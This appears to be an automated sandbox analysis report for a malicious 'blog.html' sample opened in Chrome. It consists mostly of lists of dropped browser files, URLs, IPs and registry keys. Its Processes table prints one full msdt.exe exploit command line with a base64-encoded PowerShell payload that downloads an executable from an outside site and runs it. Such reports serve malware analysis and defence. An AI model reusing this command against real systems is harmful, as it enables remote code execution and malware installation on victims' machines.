Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
blog.html
|
HTML document, ASCII text, with very long lines
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\0d1c0ef1-a94b-4764-9ce2-1fb329d732e9.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\26042c81-0362-4ed1-b2bd-f19db7f9e25e.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\26bfe8ff-73e0-4735-b68c-19bed3c6a7da.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\43104c56-bbb4-4eef-bb3e-39e8653e5b60.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\6f2c5d02-2ad4-46ec-aed7-64540d8f3c5a.tmp
|
PGP symmetric key encrypted data - Plaintext or unencrypted data salted -
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\7552f82c-e9a6-4972-89df-a36841e27bc3.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\9582e46b-0c46-4180-b70a-dabd60d42453.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0461008a-521d-4adc-aee7-bbeab2fbba18.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1b5dac5c-b9fd-4eec-bd56-4ce09e5b3ee4.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\3c49d8d5-7e17-4258-8b3a-f920eff2a7cd.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\59255b8c-1462-45ff-b066-eaa9c60b80e9.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6d811744-25fb-4c6f-8258-20ff3ddb4738.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\7db1c155-3f0c-4329-b632-21cd3673f786.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9e3bcc32-6b47-4aae-9244-2076cc26de07.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\84e1d201-80a6-4e6e-9f8a-7dcb319e9d15.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\7bb7e723-11a5-43d8-abb5-a21c25034ef8.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent
State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ab18911e-0c5b-4e4b-80d5-295258663a7f.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cf47502d-d48b-449e-8336-663937481117.tmp
|
UTF-8 Unicode text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\e779ae6e-216c-40b0-aeeb-cd5255010abc.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f774bf19-1e4f-49b6-bfe0-da887204a779.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\b6b8285d-916c-4c9b-a475-f4cf41dbdd48.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\ddbc0aa6-bd38-4288-81bc-a4ab0c043cec.tmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\ecdf4168-9c6f-4ead-b1d3-315f85610e0e.tmp
|
ASCII text, with very long lines, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\f8602d28-b1de-47eb-a896-561687c1d801.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Google\Chrome\User Data\f8fd1f62-c9f5-4d36-9168-2e36a91b4906.tmp
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4bb935c4-12fa-4ae6-9272-8704f42aef9e.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_1085031112\Recovery.crx3
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_1085031112\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_1085031112\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_1085031112\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_pnacl_json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o
|
ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a
|
current ar archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9,
stripped
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\manifest.fingerprint
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\6260_497356447\manifest.json
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\a19bdd8c-6587-4fea-a705-316a6eda04f0.tmp
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\4bb935c4-12fa-4ae6-9272-8704f42aef9e.tmp
|
Google Chrome extension, version 3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\bg\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\ca\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\cs\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\da\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\de\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\el\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\en\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\en_GB\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\es\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\es_419\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\et\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\fi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\fil\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\fr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\hi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\hr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\hu\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\id\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\it\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\ja\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\ko\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\lt\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\lv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\nb\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\nl\messages.json
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\pl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\pt_BR\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\pt_PT\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\ro\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\ru\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\sk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\sl\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\sr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\sv\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\th\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\tr\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\uk\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\vi\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\zh_CN\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_locales\zh_TW\messages.json
|
UTF-8 Unicode text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\_metadata\verified_contents.json
|
ASCII text, with very long lines, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\craw_background.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\craw_window.js
|
ASCII text, with very long lines
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\css\craw_window.css
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\html\craw_window.html
|
HTML document, ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\images\flapper.gif
|
GIF image data, version 89a, 30 x 30
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\images\icon_128.png
|
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\images\icon_16.png
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\images\topbar_floating_button.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\images\topbar_floating_button_close.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\images\topbar_floating_button_hover.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\images\topbar_floating_button_maximize.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\images\topbar_floating_button_pressed.png
|
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\scoped_dir6260_585068464\CRX_INSTALL\manifest.json
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 112 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\blog.html
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,2458455930681396657,16758854869973346526,131072
--lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8
|
||
|
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dns.google
|
unknown
|
||
|
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
|
unknown
|
||
|
https://www.google.com/intl/en-US/chrome/blank.html
|
unknown
|
||
|
https://ogs.google.com
|
unknown
|
||
|
https://www.google.com/images/cleardot.gif
|
unknown
|
||
|
https://play.google.com
|
unknown
|
||
|
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
142.250.185.109
|
||
|
https://payments.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
|
unknown
|
||
|
https://sandbox.google.com/payments/v4/js/integrator.js
|
unknown
|
||
|
https://www.google.com/images/x2.gif
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
142.250.186.174
|
||
|
https://accounts.google.com/MergeSession
|
unknown
|
||
|
http://llvm.org/):
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://www.google.com/images/dot2.gif
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry%s:
|
unknown
|
||
|
https://code.google.com/p/nativeclient/issues/entry
|
unknown
|
||
|
https://accounts.google.com
|
unknown
|
||
|
https://clients2.googleusercontent.com
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://www.google.com/accounts/OAuthLogin?issueuberauth=1
|
unknown
|
||
|
https://www.google.com/
|
unknown
|
||
|
https://www-googleapis-staging.sandbox.google.com
|
unknown
|
||
|
https://chromium.googlesource.com/a/native_client/pnacl-clang.git
|
unknown
|
||
|
https://clients2.google.com
|
unknown
|
||
|
https://clients2.google.com/service/update2/crx
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
accounts.google.com
|
142.250.185.109
|
||
|
clients.l.google.com
|
142.250.186.174
|
||
|
clients2.google.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.185.109
|
accounts.google.com
|
United States
|
||
|
192.168.2.1
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
192.168.2.23
|
unknown
|
unknown
|
||
|
142.250.186.174
|
clients.l.google.com
|
United States
|
||
|
192.168.2.7
|
unknown
|
unknown
|
||
|
127.0.0.1
|
unknown
|
unknown
|
||
|
192.168.2.5
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mfehgcgbbipciphmccgaenjidiccnmng
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
pkedcjkdefgpdelpbcmbmeomcjbeemfm
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
dr
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blacklist_cache_md5_digest
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
